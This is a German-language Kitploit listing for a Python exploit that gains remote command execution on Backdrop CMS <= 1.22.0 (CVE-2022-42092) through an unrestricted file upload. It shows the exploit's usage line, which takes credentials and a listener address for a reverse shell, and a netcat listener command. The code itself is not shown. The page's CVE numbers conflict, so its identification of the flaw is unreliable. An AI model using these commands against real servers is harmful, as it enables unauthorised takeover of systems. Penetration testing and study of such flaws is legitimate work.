Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-42092 — CVE-2023-46818 Python3-Exploit für Backdrop CMS <= 1.22.0 – Authentifizierte Remote-Befehlsausführung (RCE) | Kitploit
Tools/GitHubGitHub/ajdumanhug/cve-2022-42092
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubajdumanhug/cve-2022-42092

CVE-2022-42092

CVE-2023-46818 Python3-Exploit für Backdrop CMS <= 1.22.0 – Authentifizierte Remote-Befehlsausführung (RCE)

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-42092 Python-Exploit

🔥 Beschreibung

Dieses Python-Exploit-Skript zielt auf einen uneingeschränkten Datei-Upload in Backdrop CMS ab, um eine Remote Code Execution (RCE) zu erreichen.

⚠️ Betroffene Versionen

Version 1.22.0 und frühere Versionen Hinweis: Backdrop CMS bestreitet dies und argumentiert, dass erweiterte Berechtigungen erforderlich sind, weshalb die Schwachstelle in Versionen über 1.22.0 möglicherweise weiterhin vorhanden ist. Meiner Vermutung nach ist damit gemeint, dass man zuerst über Admin-Zugriff verfügen müsste. Dennoch ist es eine legitime Schwachstelle, die auf jeden Fall ausgenutzt werden kann, um die volle Kontrolle über das System zu erlangen.

⚙️ Verwendung

root@kitploit:~
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>

Wichtig: Starte deinen Listener, bevor du das Skript ausführst:

root@kitploit:~
nc -lvnp <listener_port>

💻 Beispiellauf

image

ℹ️ Referenz

  • CVE-2022-42092 Detail
Tool herunterladen